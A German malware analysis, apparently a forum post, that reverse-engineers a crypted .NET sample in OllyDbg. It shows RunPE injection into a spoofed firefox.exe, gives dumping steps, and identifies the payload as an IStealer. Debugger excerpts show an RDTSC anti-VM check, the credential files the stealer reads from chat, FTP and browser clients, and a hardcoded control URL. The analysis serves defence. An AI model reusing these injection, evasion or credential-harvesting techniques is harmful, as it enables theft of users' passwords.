kleine Analyse im OllyDbg:
kein normaler NET EntryPoint
Code:
004073FE >- FF25 00204000 JMP DWORD PTR DS:[<&mscoree._CorExeMain>>; mscoree._CorExeMain
Den bis jetzt nur bei "NET Crypt0rn" gesehen.
Startet eine komische Firefox.exe von:
Code:
0012E9E4 00D92493 /CALL to CreateProcessA from 00D92491
0012E9E8 00000000 |ModuleFileName = NULL
0012E9EC 00181F18 |CommandLine = "C:\DOCUME~1\IETest\Local Settings\Temp\XNl1zF7eHXTtt\firefox.exe"
SUSPENDED
Original ist die Exe ein:
"Visual Basic Command Line Compiler"
Zumindest bei mir gibt es einen "BAD EXE Format" Fehler zurück, solange "ModuleFileNAme" = NULL ist, aber vielleicht ist mein XP schon so veraltet, dass es nicht mehr berücksichtigt wird
.
Oder der "Crypt0rCoder" hat hier einen Fehler gemacht und Code vergessen
. Bei mir startet es jedenfalls nur, wenn ich "per Hand" nachhelfe und beim CreateProcessA den ModuleFileName auch auf diese "Firefox.exe" setzte.
Wie dem auch sei, in die gestartete Exe wird neuer Inhalt geschrieben. Also RUNPE Muster.
Komischerweise habe ich keine Anti-VM entdecken können. Der neue Inhalt der "Firefox.exe" lässt sich wunderbar dumpen. Dazu platziert man nach dem "CreateProcessA" Aufruf einen Breakpoint auf ZwResumeThread und wenn dieser aufgerufen wird, kann man in Olly den "firefox" Prozess attachen, über Alt+M die Memory-Map anzeigen lassen und den 400000 Bereich über Rechtsklick -> "Dump memory area" speichern.
Den Dump muss man noch fixen: dazu im CFF Explorer öffnen und bei Section Headers die "RawAddress" Werte gleich "VirtualAddress" setzen.
Nun sieht man, dass es ein IStealer ist. Kann in Olly geladen werden.
Anti-VM:
Code:
00401BBA |> /0F31 /RDTSC
00401BBC |. |8BD8 |MOV EBX,EAX
00401BBE |. |0F31 |RDTSC
00401BC0 |. |2BC3 |SUB EAX,EBX
00401BC2 |. |50 |PUSH EAX
00401BC3 |. |83F8 01 |CMP EAX,1
00401BC6 |.^\74 F2 \JE SHORT DUMP_004.00401BBA
00401BC8 |. 58 POP EAX
00401BC9 |. 3D 00020000 CMP EAX,200
00401BCE |. 72 09 JB SHORT DUMP_004.00401BD9 <--- zu JMP
Liest aus:
Code:
0012F3B8 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012F3BC 7FFDFC00 |FileName = "C:\Program Files\Trillian\users\default\msn.ini"
0012F3B8 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012F3BC 7FFDFC00 |FileName = "C:\Program Files\Trillian\users\default\aim.ini"
0012F3B8 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012F3BC 7FFDFC00 |FileName = "C:\Program Files\Trillian\users\default\yahoo.ini"
0012F5D8 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012F5DC 7FFDFC00 |FileName = "C:\Documents and Settings\IETest\Application Data\.purple\accounts.xml"
0012F248 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012F24C 7FFDFC00 |FileName = "C:\program files\steam\ClientRegistry.blob"
0012F5A0 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012F5A4 7FFDFC00 |FileName = "C:\Documents and Settings\All Users\Application Data\DynDNS\Updater\config.dyndns"
0012D788 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012D78C 7FFDFC00 |FileName = "C:\Documents and Settings\IETest\Application Data\Mozilla\Firefox\Profiles/enjxr3uc.default/secmod.db"
0012F258 7C82773F /CALL to CreateFileW from kernel32.7C82773A
0012F25C 7FFDFC00 |FileName = "C:\Documents and Settings\IETest\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data"
0012EE84 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012EE88 7FFDFC00 |FileName = "C:\Documents and Settings\IETest\Application Data\Opera\Opera\wand.dat"
0012F5A0 7C801A53 /CALL to CreateFileW from kernel32.7C801A4E
0012F5A4 7FFDFC00 |FileName = "C:\Documents and Settings\IETest\Application Data\FileZilla\recentservers.xml"
Masterseite:
Code:
004059CB |. 68 B6564500 PUSH DUMP_004.004556B6 ; ASCII "http://hundekopf.hu.funpic.de/blog/index.php/"